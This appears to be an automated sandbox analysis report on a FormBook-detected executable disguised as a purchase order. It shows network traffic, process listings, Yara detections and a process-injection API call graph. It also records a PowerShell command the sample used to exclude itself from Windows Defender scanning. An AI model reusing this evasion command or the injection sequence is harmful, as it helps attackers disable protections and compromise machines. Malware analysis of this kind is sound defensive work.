[TRUNCATED]
                                                                                                      Nov 18, 2024 13:55:52.522660971 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:52 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uD4l0%2FJdSKjgA%2FvD7RNAAK02qN%2BjGt5SAa2WE9QITWnuJYrefV44qJEUWTvKT187Z3MrtbLRLHjTg34RC2kMYc8mCcqn5x2yJCwcVIorbVq9TsgdCdF9N3wRdR3mBGG%2BBS%2FIRabrV0eh"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481e068dcb0b99-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                                      Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                                                                                                      Nov 18, 2024 13:55:52.522773981 CET346INData Raw: 49 ec 44 60 d4 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a
                                                                                                      Data Ascii: ID`5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:07:52:46
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Users\user\Desktop\PO 20495088.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0xbb0000
                                                                                                      File size:710'144 bytes
                                                                                                      MD5 hash:68465DD1E3101B1BFA0CFF10EBADB8CC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0x650000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Users\user\Desktop\PO 20495088.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0xbd0000
                                                                                                      File size:710'144 bytes
                                                                                                      MD5 hash:68465DD1E3101B1BFA0CFF10EBADB8CC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:07:53:32
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe"
                                                                                                      Imagebase:0xd20000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:07:53:34
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\sdiagnhost.exe"
                                                                                                      Imagebase:0x230000
                                                                                                      File size:31'744 bytes
                                                                                                      MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:07:53:47
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe"
                                                                                                      Imagebase:0xd20000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:07:53:59
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff79f9e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:5.2%
                                                                                                        Total number of Nodes:286
                                                                                                        Total number of Limit Nodes:17
                                                                                                        execution_graph 50833 1584668 50834 1584672 50833->50834 50838 1584758 50833->50838 50843 1583e28 50834->50843 50836 158468d 50839 158477d 50838->50839 50847 1584858 50839->50847 50851 1584868 50839->50851 50844 1583e33 50843->50844 50859 1585c70 50844->50859 50846 1586faf 50846->50836 50849 1584868 50847->50849 50848 158496c 50848->50848 50849->50848 50855 15844b0 50849->50855 50853 158488f 50851->50853 50852 158496c 50852->50852 50853->50852 50854 15844b0 CreateActCtxA 50853->50854 50854->50852 50856 15858f8 CreateActCtxA 50855->50856 50858 15859bb 50856->50858 50860 1585c7b 50859->50860 50863 1585c90 50860->50863 50862 1587065 50862->50846 50864 1585c9b 50863->50864 50867 1585cc0 50864->50867 50866 1587142 50866->50862 50868 1585ccb 50867->50868 50869 1585cf0 GetModuleHandleW 50868->50869 50870 1587245 50869->50870 50870->50866 50871 54eb77a 50872 54eb780 50871->50872 50873 54e940c GetModuleHandleW 50872->50873 50874 54eb78f 50873->50874 50875 748cebd 50879 748dd2f 50875->50879 50895 748dd30 50875->50895 50876 748ced1 50880 748dd4a 50879->50880 50911 748e669 50880->50911 50915 748e294 50880->50915 50924 748e612 50880->50924 50928 748e5ff 50880->50928 50933 748e39e 50880->50933 50938 748e2da 50880->50938 50943 748e4d8 50880->50943 50951 748ea07 50880->50951 50956 748e302 50880->50956 50965 748e722 50880->50965 50974 748e1ce 50880->50974 50979 748e2ca 50880->50979 50987 748e449 50880->50987 50881 748dd52 50881->50876 50896 748dd4a 50895->50896 50898 748e669 2 API calls 50896->50898 50899 748e449 2 API calls 50896->50899 50900 748e2ca 4 API calls 50896->50900 50901 748e1ce 2 API calls 50896->50901 50902 748e722 4 API calls 50896->50902 50903 748e302 4 API calls 50896->50903 50904 748ea07 2 API calls 50896->50904 50905 748e4d8 4 API calls 50896->50905 50906 748e2da 2 API calls 50896->50906 50907 748e39e 2 API calls 50896->50907 50908 748e5ff 2 API calls 50896->50908 50909 748e612 2 API calls 50896->50909 50910 748e294 4 API calls 50896->50910 50897 748dd52 50897->50876 50898->50897 50899->50897 50900->50897 50901->50897 50902->50897 50903->50897 50904->50897 50905->50897 50906->50897 50907->50897 50908->50897 50909->50897 50910->50897 50992 748c668 50911->50992 50996 748c670 50911->50996 50912 748e683 50912->50881 50916 748e29d 50915->50916 50917 748e2af 50916->50917 50919 748e781 50916->50919 50920 748c668 Wow64SetThreadContext 50916->50920 50921 748c670 Wow64SetThreadContext 50916->50921 50917->50881 50918 748e942 50917->50918 51000 748c5b9 50917->51000 51004 748c5c0 50917->51004 50920->50916 50921->50916 51008 748c808 50924->51008 51012 748c800 50924->51012 50925 748e329 50929 748e5e6 50928->50929 50929->50881 50930 748e942 50929->50930 50931 748c5b9 ResumeThread 50929->50931 50932 748c5c0 ResumeThread 50929->50932 50931->50929 50932->50929 50934 748e3c7 50933->50934 50934->50881 50935 748e942 50934->50935 50936 748c5b9 ResumeThread 50934->50936 50937 748c5c0 ResumeThread 50934->50937 50936->50934 50937->50934 50939 748e2ea 50938->50939 50941 748c808 WriteProcessMemory 50939->50941 50942 748c800 WriteProcessMemory 50939->50942 50940 748e574 50940->50881 50941->50940 50942->50940 50944 748e4dc 50943->50944 51016 748c748 50944->51016 51020 748c740 50944->51020 50945 748e4fd 50945->50881 50946 748eb3a 50945->50946 50949 748c808 WriteProcessMemory 50945->50949 50950 748c800 WriteProcessMemory 50945->50950 50946->50881 50946->50946 50949->50945 50950->50945 50952 748e710 50951->50952 50952->50881 50953 748eb3a 50952->50953 50954 748c808 WriteProcessMemory 50952->50954 50955 748c800 WriteProcessMemory 50952->50955 50953->50881 50954->50952 50955->50952 50957 748e29d 50956->50957 50958 748e2af 50957->50958 50960 748e781 50957->50960 50963 748c668 Wow64SetThreadContext 50957->50963 50964 748c670 Wow64SetThreadContext 50957->50964 50958->50881 50959 748e942 50958->50959 50961 748c5b9 ResumeThread 50958->50961 50962 748c5c0 ResumeThread 50958->50962 50961->50958 50962->50958 50963->50957 50964->50957 50970 748c668 Wow64SetThreadContext 50965->50970 50971 748c670 Wow64SetThreadContext 50965->50971 50966 748e29d 50966->50965 50967 748e781 50966->50967 50968 748e2af 50966->50968 50968->50881 50969 748e942 50968->50969 50972 748c5b9 ResumeThread 50968->50972 50973 748c5c0 ResumeThread 50968->50973 50970->50966 50971->50966 50972->50968 50973->50968 50975 748e1e0 50974->50975 51024 748ca90 50975->51024 51028 748ca85 50975->51028 50980 748e4dc 50979->50980 50983 748c748 VirtualAllocEx 50980->50983 50984 748c740 VirtualAllocEx 50980->50984 50981 748e4fd 50981->50881 50982 748eb3a 50981->50982 50985 748c808 WriteProcessMemory 50981->50985 50986 748c800 WriteProcessMemory 50981->50986 50982->50881 50983->50981 50984->50981 50985->50981 50986->50981 50988 748e512 50987->50988 51032 748c8f8 50988->51032 51036 748c8f0 50988->51036 50989 748e534 50993 748c670 Wow64SetThreadContext 50992->50993 50995 748c6fd 50993->50995 50995->50912 50997 748c6b5 Wow64SetThreadContext 50996->50997 50999 748c6fd 50997->50999 50999->50912 51001 748c5c0 ResumeThread 51000->51001 51003 748c631 51001->51003 51003->50917 51005 748c600 ResumeThread 51004->51005 51007 748c631 51005->51007 51007->50917 51009 748c850 WriteProcessMemory 51008->51009 51011 748c8a7 51009->51011 51011->50925 51013 748c808 WriteProcessMemory 51012->51013 51015 748c8a7 51013->51015 51015->50925 51017 748c788 VirtualAllocEx 51016->51017 51019 748c7c5 51017->51019 51019->50945 51021 748c748 VirtualAllocEx 51020->51021 51023 748c7c5 51021->51023 51023->50945 51025 748cb19 CreateProcessA 51024->51025 51027 748ccdb 51025->51027 51027->51027 51029 748ca90 CreateProcessA 51028->51029 51031 748ccdb 51029->51031 51031->51031 51033 748c943 ReadProcessMemory 51032->51033 51035 748c987 51033->51035 51035->50989 51037 748c8f8 ReadProcessMemory 51036->51037 51039 748c987 51037->51039 51039->50989 50714 54e72d8 50715 54e7303 50714->50715 50735 54e6e84 50715->50735 50717 54e733c 50739 54e6ea4 50717->50739 50719 54e7378 50743 54e6eb4 50719->50743 50725 54e73d2 50726 54e6eb4 GetModuleHandleW 50725->50726 50727 54e740e 50726->50727 50728 54e6fdc GetModuleHandleW 50727->50728 50729 54e742c 50728->50729 50730 54e6fec GetModuleHandleW 50729->50730 50731 54e744a 50730->50731 50733 54e7aa1 50731->50733 50755 1585cf0 50731->50755 50736 54e6e8f 50735->50736 50738 1585cf0 GetModuleHandleW 50736->50738 50737 54e88d7 50737->50717 50738->50737 50740 54e6eaf 50739->50740 50741 54e6fec GetModuleHandleW 50740->50741 50742 54e94c9 50741->50742 50742->50719 50744 54e6ebf 50743->50744 50762 54e9398 50744->50762 50746 54e7396 50747 54e6fdc 50746->50747 50748 54e6fe7 50747->50748 50766 54e940c 50748->50766 50750 54e73b4 50751 54e6fec 50750->50751 50752 54e6ff7 50751->50752 50753 54e957b 50752->50753 50754 1585cf0 GetModuleHandleW 50752->50754 50753->50725 50754->50753 50756 1585cfb 50755->50756 50758 158854b 50756->50758 50770 158abf8 50756->50770 50757 1588589 50758->50757 50774 158cce0 50758->50774 50779 158ccf0 50758->50779 50763 54e93a3 50762->50763 50765 1585cf0 GetModuleHandleW 50763->50765 50764 54eb514 50764->50746 50765->50764 50767 54e9417 50766->50767 50768 54eb7c2 50767->50768 50769 1585cf0 GetModuleHandleW 50767->50769 50768->50750 50769->50768 50784 158ac30 50770->50784 50787 158ac20 50770->50787 50771 158ac0e 50771->50758 50775 158ccf0 50774->50775 50776 158cd35 50775->50776 50796 158d298 50775->50796 50800 158d2a8 50775->50800 50776->50757 50780 158cd11 50779->50780 50781 158cd35 50780->50781 50782 158d298 GetModuleHandleW 50780->50782 50783 158d2a8 GetModuleHandleW 50780->50783 50781->50757 50782->50781 50783->50781 50791 158ad28 50784->50791 50785 158ac3f 50785->50771 50788 158ac30 50787->50788 50790 158ad28 GetModuleHandleW 50788->50790 50789 158ac3f 50789->50771 50790->50789 50792 158ad39 50791->50792 50793 158ad5c 50791->50793 50792->50793 50794 158af60 GetModuleHandleW 50792->50794 50793->50785 50795 158af8d 50794->50795 50795->50785 50797 158d2b5 50796->50797 50798 158d2ef 50797->50798 50804 158ce94 50797->50804 50798->50776 50801 158d2b5 50800->50801 50802 158d2ef 50801->50802 50803 158ce94 GetModuleHandleW 50801->50803 50802->50776 50803->50802 50805 158ce9f 50804->50805 50807 158dc00 50805->50807 50808 158cfbc 50805->50808 50807->50807 50809 158cfc7 50808->50809 50810 1585cf0 GetModuleHandleW 50809->50810 50811 158dc6f 50810->50811 50811->50807 50812 158d3c0 50813 158d406 50812->50813 50817 158d591 50813->50817 50820 158d5a0 50813->50820 50814 158d4f3 50823 158cf5c 50817->50823 50821 158d5ce 50820->50821 50822 158cf5c DuplicateHandle 50820->50822 50821->50814 50822->50821 50824 158d608 DuplicateHandle 50823->50824 50825 158d5ce 50824->50825 50825->50814 50826 748ef60 50827 748f0eb 50826->50827 50829 748ef86 50826->50829 50829->50827 50830 748ae68 50829->50830 50831 748f1e0 PostMessageW 50830->50831 50832 748f24c 50831->50832 50832->50829 50669 153d01c 50670 153d034 50669->50670 50671 153d08e 50670->50671 50674 54e2818 50670->50674 50679 54e2809 50670->50679 50675 54e2845 50674->50675 50676 54e2877 50675->50676 50685 54e2d98 50675->50685 50690 54e2da8 50675->50690 50680 54e27b3 50679->50680 50681 54e2816 50679->50681 50680->50671 50682 54e2877 50681->50682 50683 54e2d98 2 API calls 50681->50683 50684 54e2da8 2 API calls 50681->50684 50683->50682 50684->50682 50686 54e2da8 50685->50686 50695 54e2e50 50686->50695 50699 54e2e60 50686->50699 50687 54e2e48 50687->50676 50692 54e2dbc 50690->50692 50691 54e2e48 50691->50676 50693 54e2e50 2 API calls 50692->50693 50694 54e2e60 2 API calls 50692->50694 50693->50691 50694->50691 50696 54e2e60 50695->50696 50697 54e2e71 50696->50697 50702 54e4021 50696->50702 50697->50687 50700 54e2e71 50699->50700 50701 54e4021 2 API calls 50699->50701 50700->50687 50701->50700 50706 54e4040 50702->50706 50710 54e4050 50702->50710 50703 54e403a 50703->50697 50707 54e4092 50706->50707 50709 54e4099 50706->50709 50708 54e40ea CallWindowProcW 50707->50708 50707->50709 50708->50709 50709->50703 50711 54e4092 50710->50711 50713 54e4099 50710->50713 50712 54e40ea CallWindowProcW 50711->50712 50711->50713 50712->50713 50713->50703

                                                                                                        Executed Functions

                                                                                                        Function 054E72D8 Relevance: 16.4, Strings: 12, Instructions: 1370COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 505 54e72d8-54e77fb call 54e6e84 call 54e6e94 call 54e6ea4 call 54e6eb4 call 54e6fdc call 54e6fec call 54e6e94 call 54e6eb4 call 54e6fdc call 54e6fec call 54e6ffc * 2 call 54e700c call 54e701c call 54e702c call 54e703c call 54e704c call 54e6ffc * 4 call 54e705c call 54e701c call 54e706c call 54e703c call 54e707c 820 54e77fe call 54e8ed0 505->820 821 54e77fe call 54e8ec1 505->821 598 54e7800-54e7891 call 54e708c call 54e709c 609 54e7897-54e78cd 598->609 610 54e79e4-54e7a05 598->610 611 54e8802-54e88d2 call 1585cf0 609->611 612 54e78d3-54e78f0 609->612 621 54e7a07-54e7a0d 610->621 622 54e7a13-54e7a54 610->622 643 54e88d7-54e890f 611->643 612->611 614 54e78f6-54e790b 612->614 614->611 616 54e7911-54e793a call 54e70ac 614->616 616->611 623 54e7940-54e795c 616->623 625 54e7a0f 621->625 626 54e7a11 621->626 638 54e7a6c-54e7a7d 622->638 639 54e7a56-54e7a5c 622->639 627 54e795e 623->627 628 54e7961-54e7986 623->628 625->622 626->622 627->628 628->611 633 54e798c-54e79a2 628->633 633->611 634 54e79a8-54e79bb 633->634 634->611 637 54e79c1-54e79de 634->637 637->609 637->610 638->611 645 54e7a83-54e7a9b 638->645 641 54e7a5e 639->641 642 54e7a60-54e7a62 639->642 641->638 642->638 645->611 648 54e7aa1-54e7b27 645->648 659 54e7b2d-54e8801 call 54e700c call 54e701c call 54e703c call 54e704c call 54e70bc call 54e70cc call 54e700c call 54e701c call 54e703c call 54e704c call 54e70dc call 54e70ec call 54e700c call 54e701c call 54e703c call 54e704c call 54e700c call 54e701c call 54e703c call 54e704c call 54e6ffc * 3 call 54e705c call 54e701c call 54e706c call 54e703c call 54e707c call 54e70fc call 54e70cc call 54e700c call 54e701c call 54e703c call 54e704c call 54e70dc call 54e700c call 54e701c call 54e703c call 54e704c call 54e700c call 54e701c call 54e703c call 54e704c call 54e710c call 54e711c call 54e712c call 54e6ffc call 54e713c call 54e714c call 54e715c call 54e701c call 54e716c call 54e717c * 2 648->659 820->598 821->598
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $&$&$0$0$2$6$6$$eq
                                                                                                        • API String ID: 0-3159671626
                                                                                                        • Opcode ID: 40cca7186f7ad152c20ca02d37c40fcb57e5cc0efee03baa8d94dbc7c83b1d26
                                                                                                        • Instruction ID: 7eaa25a8b0c2284ea779425deedd73e0ce1814c8f8673dacdccbd2b2b47f23c3
                                                                                                        • Opcode Fuzzy Hash: 40cca7186f7ad152c20ca02d37c40fcb57e5cc0efee03baa8d94dbc7c83b1d26
                                                                                                        • Instruction Fuzzy Hash: 58E22B30A10705CFCB55EF74C898ADAB7B2FF89301F5186AAD5496B360EB71A985CF40
                                                                                                        Function 054FD828 Relevance: 8.1, Strings: 6, Instructions: 610COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4|jq$4|jq$$eq
                                                                                                        • API String ID: 0-3429346994
                                                                                                        • Opcode ID: 355db3257c95ce8ad185f0aa61df47ee9e5059cd7c2a139d2524f6c776c962fa
                                                                                                        • Instruction ID: ca57789f4da7d1e27a02066a622c1b08280e1c8f31a8269ba89bb6a6134582c5
                                                                                                        • Opcode Fuzzy Hash: 355db3257c95ce8ad185f0aa61df47ee9e5059cd7c2a139d2524f6c776c962fa
                                                                                                        • Instruction Fuzzy Hash: 6F22CA71F042058FCB19DF6DD498AAE7BB2BF89310B1984AAD506DB351DB31DC42CB91
                                                                                                        Function 054FCCF6 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1121 54fccf6-54fccfa 1122 54fd6bd-54fd6cb 1121->1122 1123 54fccfb-54fcd10 1121->1123 1123->1122 1124 54fcd11-54fcd1c 1123->1124 1126 54fcd22-54fcd2e 1124->1126 1127 54fcd3a-54fcd49 1126->1127 1129 54fcda8-54fcdac 1127->1129 1130 54fce54-54fcebe 1129->1130 1131 54fcdb2-54fcdbb 1129->1131 1130->1122 1169 54fcec4-54fd40b 1130->1169 1132 54fccb6-54fccc2 1131->1132 1133 54fcdc1-54fcdd7 1131->1133 1132->1122 1135 54fccc8-54fccd4 1132->1135 1140 54fce29-54fce3b 1133->1140 1141 54fcdd9-54fcddc 1133->1141 1136 54fcd4b-54fcd51 1135->1136 1137 54fccd6-54fccea 1135->1137 1136->1122 1142 54fcd57-54fcd6f 1136->1142 1137->1136 1147 54fccec-54fccf5 1137->1147 1150 54fd5fc-54fd6b2 1140->1150 1151 54fce41-54fce51 1140->1151 1141->1122 1144 54fcde2-54fce1f 1141->1144 1142->1122 1149 54fcd75-54fcd9d 1142->1149 1144->1130 1165 54fce21-54fce27 1144->1165 1147->1121 1149->1129 1150->1122 1165->1140 1165->1141 1247 54fd40d-54fd417 1169->1247 1248 54fd422-54fd4b5 1169->1248 1249 54fd41d 1247->1249 1250 54fd4c0-54fd553 1247->1250 1248->1250 1252 54fd55e-54fd5f1 1249->1252 1250->1252 1252->1150
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D
                                                                                                        • API String ID: 0-2746444292
                                                                                                        • Opcode ID: b672cee15330cda9144460e67313588e4c2ba2b664d613d2bcb796777b105441
                                                                                                        • Instruction ID: 0559c19de8858aeefc69d5b0563b472d9b8d705362b4cf1899f91ee026d651e1
                                                                                                        • Opcode Fuzzy Hash: b672cee15330cda9144460e67313588e4c2ba2b664d613d2bcb796777b105441
                                                                                                        • Instruction Fuzzy Hash: AF52A674A102299FCB64DF68D998A9DBBB2FF89310F1081D9D509A7365CB30AEC1CF51
                                                                                                        Function 0AD50040 Relevance: .6, Instructions: 633COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2368528787.000000000AD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ad50000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
